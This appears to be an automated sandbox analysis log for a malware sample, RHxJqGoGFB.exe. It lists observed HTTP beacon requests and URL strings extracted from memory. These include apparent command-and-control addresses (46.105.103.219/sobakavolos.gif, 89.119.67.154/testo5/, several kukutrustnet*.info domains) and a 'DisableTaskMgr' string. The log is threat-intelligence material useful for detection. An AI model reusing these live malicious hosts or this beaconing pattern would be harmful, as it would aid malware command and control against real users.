        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?e7c0a656=226918236 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?eaf3a57c=-2118786840 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /sobakavolos.gif?ee5adceb=1926686552 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 46.105.103.219Cache-Control: no-cache
        Source: SearchApp.exe, 00000013.00000000.2039034540.0000024B551F6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: www.google.www.yahoo. equals www.yahoo.com (Yahoo)
        Source: RHxJqGoGFB.exe, 00000000.00000003.3455032269.0000000005854000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000003.3455330056.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.105.103.219/sobakak
        Source: RHxJqGoGFB.exe, RHxJqGoGFB.exe, 00000000.00000002.4215278724.0000000000760000.00000004.10000000.00040000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000002.4231012043.0000000000977000.00000040.00001000.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000002.4268486662.000000000379B000.00000004.00000010.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000002.4224126258.00000000008B9000.00000004.00000010.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000002.4171472191.0000000000401000.00000040.00000001.01000000.00000003.sdmp, RHxJqGoGFB.exe, 00000000.00000003.1707211906.000000000045B000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000002.4178026991.000000000047A000.00000004.00000020.00020000.00000000.sdmp, kgTxkwCMEtRJHvgbWwUB.exe, 00000023.00000002.4185881293.0000000000890000.00000004.10000000.00040000.00000000.sdmp, kgTxkwCMEtRJHvgbWwUB.exe, 00000029.00000002.4188857205.0000000000BB0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://46.105.103.219/sobakavolos.gif
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.105.103.219/sobakavolos.gif?102407c=118473572T
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.105.103.219/sobakavolos.gif?1a7967a=83280750I
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.105.103.219/sobakavolos.gif?247d6b5=76524906
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.105.103.219/sobakavolos.gif?2e864a2=146353638c
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.105.103.219/sobakavolos.gif?387ee8e=177720234
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.105.103.219/sobakavolos.gif?387ee8e=177720234/
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.105.103.219/sobakavolos.gif?387ee8e=177720234E
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.105.103.219/sobakavolos.gif?4289802=69769218R$u
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.105.103.219/sobakavolos.gif?4c8fe82=722530962C$
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.105.103.219/sobakavolos.gif?55ce57c=359896560p$W
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.105.103.219/sobakavolos.gif?605f574=707376684
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.105.103.219/sobakavolos.gif?6e1ab4=64942164
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.105.103.219/sobakavolos.gif?6e1ab4=64942164r
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.105.103.219/sobakavolos.gif?746f30a=366270750
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.105.103.219/sobakavolos.gif?7e81b91=530607684
        Source: RHxJqGoGFB.exe, 00000000.00000003.3455032269.0000000005854000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000003.3455330056.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.105.103.219/sobakavolos.gif?9241e6
        Source: RHxJqGoGFB.exe, 00000000.00000003.3455032269.0000000005854000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000003.3455576968.0000000005854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.105.103.219/sobakavolos.gif?9241e677=612617454J
        Source: RHxJqGoGFB.exe, 00000000.00000003.3455032269.0000000005854000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000003.3455576968.0000000005854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.105.103.219/sobakavolos.gif?a34963b3=-371447015
        Source: RHxJqGoGFB.exe, 00000000.00000003.3455032269.0000000005854000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000003.3455576968.0000000005854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.105.103.219/sobakavolos.gif?a74235ca=-343063876
        Source: RHxJqGoGFB.exe, 00000000.00000003.3455032269.0000000005854000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000003.3455576968.0000000005854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.105.103.219/sobakavolos.gif?aea19a18=1564685360
        Source: RHxJqGoGFB.exe, 00000000.00000003.3455032269.0000000005854000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000003.3455576968.0000000005854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.105.103.219/sobakavolos.gif?aea19a18=1564685360z
        Source: RHxJqGoGFB.exe, 00000000.00000003.3455032269.0000000005854000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000003.3455576968.0000000005854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.105.103.219/sobakavolos.gif?b104bfd4=-685687092
        Source: RHxJqGoGFB.exe, 00000000.00000003.3455032269.0000000005854000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000003.3455576968.0000000005854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.105.103.219/sobakavolos.gif?b104bfd4=-685687092dZ
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.105.103.219/sobakavolos.gif?b40fdb1=566425875
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.105.103.219/sobakavolos.gif?b40fdb1=566425875=%
        Source: RHxJqGoGFB.exe, 00000000.00000003.3455032269.0000000005854000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000003.3455576968.0000000005854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.105.103.219/sobakavolos.gif?b4156853=1747636390
        Source: RHxJqGoGFB.exe, 00000000.00000003.3455032269.0000000005854000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000003.3455576968.0000000005854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.105.103.219/sobakavolos.gif?b4156853=1747636390d
        Source: RHxJqGoGFB.exe, 00000000.00000003.3455032269.0000000005854000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000003.3455576968.0000000005854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.105.103.219/sobakavolos.gif?b8d36d83=-1675549809
        Source: RHxJqGoGFB.exe, 00000000.00000003.3455032269.0000000005854000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000003.3455576968.0000000005854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.105.103.219/sobakavolos.gif?b8d36d83=-1675549809Z
        Source: RHxJqGoGFB.exe, 00000000.00000002.4215278724.0000000000760000.00000004.10000000.00040000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000002.4224126258.00000000008B9000.00000004.00000010.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000002.4171472191.0000000000401000.00000040.00000001.01000000.00000003.sdmp, RHxJqGoGFB.exe, 00000000.00000003.1707211906.000000000045B000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000002.4178026991.000000000047A000.00000004.00000020.00020000.00000000.sdmp, kgTxkwCMEtRJHvgbWwUB.exe, 00000023.00000002.4185881293.0000000000890000.00000004.10000000.00040000.00000000.sdmp, kgTxkwCMEtRJHvgbWwUB.exe, 00000029.00000002.4188857205.0000000000BB0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://89.11
        Source: RHxJqGoGFB.exe, 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://89.119.67.154/testo5/
        Source: RHxJqGoGFB.exe, 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://89.119.67.154/testo5/http://kukutrustnet777.info/home.gifhttp://kukutrustnet888.info/home.gif
        Source: explorer.exe, 0000000D.00000000.1883356157.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.1885971448.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
        Source: svchost.exe, 0000000A.00000000.1864124702.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000000.1864095821.0000019E29FB9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
        Source: explorer.exe, 0000000D.00000000.1883356157.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.1885971448.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
        Source: svchost.exe, 0000000A.00000000.1864124702.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000000.1864095821.0000019E29FB9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
        Source: SearchApp.exe, 00000013.00000000.1964753726.0000024B4136F000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1981999938.0000024B422C3000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1963660195.000002434119B000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1964714282.0000024B41348000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1983410823.0000024B4247F000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1984144267.0000024B425C1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
        Source: explorer.exe, 0000000D.00000000.1883356157.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.1885971448.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
        Source: svchost.exe, 0000000A.00000000.1864124702.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000000.1864095821.0000019E29FB9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
        Source: RHxJqGoGFB.exe, 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet777.info/home.gif
        Source: RHxJqGoGFB.exe, RHxJqGoGFB.exe, 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet777888.info/
        Source: RHxJqGoGFB.exe, 00000000.00000002.4231012043.00000000008F0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet777888.info/DisableTaskMgrSoftware
        Source: RHxJqGoGFB.exe, 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet888.info/home.gif
        Source: RHxJqGoGFB.exe, 00000000.00000002.4231012043.00000000008D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://kukutrustnet987.info/home.gif
        Source: svchost.exe, 0000000A.00000000.1864124702.0000019E29FCA000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000A.00000000.1864095821.0000019E29FB9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.1883356157.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000000.1885971448.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
        Source: SearchApp.exe, 00000013.00000000.1964753726.0000024B4136F000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1981999938.0000024B422C3000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1963660195.000002434119B000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1964714282.0000024B41348000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1983410823.0000024B4247F000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1984144267.0000024B425C1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0:
        Source: explorer.exe, 0000000D.00000000.1883356157.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
        Source: SearchApp.exe, 00000013.00000000.2109147873.0000024B59C44000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/Omniroot2025.crlF15-2L
        Source: SearchApp.exe, 00000013.00000000.1991896773.0000024B441DE000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1964753726.0000024B4136F000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1981999938.0000024B422C3000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1963261928.0000024341183000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1964714282.0000024B41348000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 00000013.00000000.1983410823.0000024B4247F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.msocsp.com0
        Source: SearchApp.exe, 00000013.00000000.2034377781.0000024B54FDE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schema.skype.com/Mention
        Source: SearchApp.exe, 00000013.00000000.1955687882.0000024339C6C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.live.com/Web/
        Source: explorer.exe, 0000000D.00000000.1884699661.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.1887432165.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000D.00000000.1885217454.0000000008720000.00000002.00000001.00040000.00000000.sdmp, RuntimeBroker.exe, 00000012.00000000.1950585852.000001ECFC470000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
        Source: RHxJqGoGFB.exe, 00000000.00000002.4268486662.000000000379B000.00000004.00000010.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000002.4224126258.00000000008B9000.00000004.00000010.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000002.4171472191.0000000000401000.00000040.00000001.01000000.00000003.sdmp, RHxJqGoGFB.exe, 00000000.00000003.1707211906.000000000045B000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000002.4178026991.000000000047A000.00000004.00000020.00020000.00000000.sdmp, kgTxkwCMEtRJHvgbWwUB.exe, 00000023.00000002.4185881293.0000000000890000.00000004.10000000.00040000.00000000.sdmp, kgTxkwCMEtRJHvgbWwUB.exe, 00000029.00000002.4188857205.0000000000BB0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?137bd669=-1353021007
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?23c0ebb4=-1895584048
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?351a1728=890902312
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?3a84ca85=1595719454
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?3a84ca85=1595719454$
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?3f4695e4=2025970408
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?50768d20=-1595073984
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?52e81f=5433375
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?564061b2=1493272264
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?564061b2=1493272264p
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?5d4ae9a2=1565190562
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?5d4ae9a2=15651905621
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?6eb084dd=1390751906
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?7f4bf891=2088491733
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?7f4bf891=2088491733L
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?850adac5=169194890
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?8a6244f0=-1973271312
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?8ffc239e=-1342936358
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?8ffc239e=-1342936358R
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?a04580ea=-2129263704
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?a5cbf448=-735340920
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?a5cbf448=-735340920c
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?aba116d6=-1318608934
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?aba116d6=-1318608934o
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?afe2fd9b=-1081346452
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?afe2fd9b=-1081346452V
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?b2218d7f=-930728452
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?b2218d7f=-930728452.
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?b6c9abde=-8146158E
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?b6c9abde=-8146158H
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.00000000004FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?b6c9abde=-8146158heY
        Source: RHxJqGoGFB.exe, 00000000.00000003.3455032269.0000000005854000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000003.3455330056.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?bae437ef=816621517
        Source: RHxJqGoGFB.exe, 00000000.00000003.3455032269.0000000005854000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000003.3455330056.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?bae437ef=816621517e
        Source: RHxJqGoGFB.exe, 00000000.00000003.3455032269.0000000005854000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000003.3455330056.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?bae437ef=816621517ewf
        Source: RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?bffd1911=-1073932015Cf
        Source: RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?bffd1911=-1073932015ae
        Source: RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?c4094dae=-1470297908
        Source: RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?c76fb70f=499047484
        Source: RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?cb1bfe6d=-887357843
        Source: RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?ce953af5=1957287848
        Source: RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?ce953af5=1957287848.f
        Source: RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?d2293919=899431162Ge
        Source: RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?d2293919=899431162Je
        Source: RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?d53ab8af=2142251533
        Source: RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?d9476d1b=2093630222
        Source: RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?d9476d1b=2093630222Te&
        Source: RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?dcb5489d=1334471441
        Source: RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?dcb5489d=1334471441Pf
        Source: RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?e14e2c8c=-1544911452
        Source: RHxJqGoGFB.exe, 00000000.00000003.4011058388.000000000585B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?e6095c35=-871188374
        Source: RHxJqGoGFB.exe, 00000000.00000002.4178026991.000000000043E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?ecc6b51c=1069749016
        Source: RHxJqGoGFB.exe, 00000000.00000002.4268486662.000000000379B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gif?f017666e=1892850142
        Source: RHxJqGoGFB.exe, 00000000.00000002.4268486662.000000000379B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gifavolos.gif
        Source: RHxJqGoGFB.exe, 00000000.00000002.4215278724.0000000000760000.00000004.10000000.00040000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000002.4224126258.00000000008B9000.00000004.00000010.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000002.4171472191.0000000000401000.00000040.00000001.01000000.00000003.sdmp, RHxJqGoGFB.exe, 00000000.00000003.1707211906.000000000045B000.00000004.00000020.00020000.00000000.sdmp, RHxJqGoGFB.exe, 00000000.00000002.4178026991.000000000047A000.00000004.00000020.00020000.00000000.sdmp, kgTxkwCMEtRJHvgbWwUB.exe, 00000023.00000002.4185881293.0000000000890000.00000004.10000000.00040000.00000000.sdmp, kgTxkwCMEtRJHvgbWwUB.exe, 00000029.00000002.4188857205.0000000000BB0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://slwocfd/sobaka1.gifhttp://46.105.103.219/sobakavolos.gif
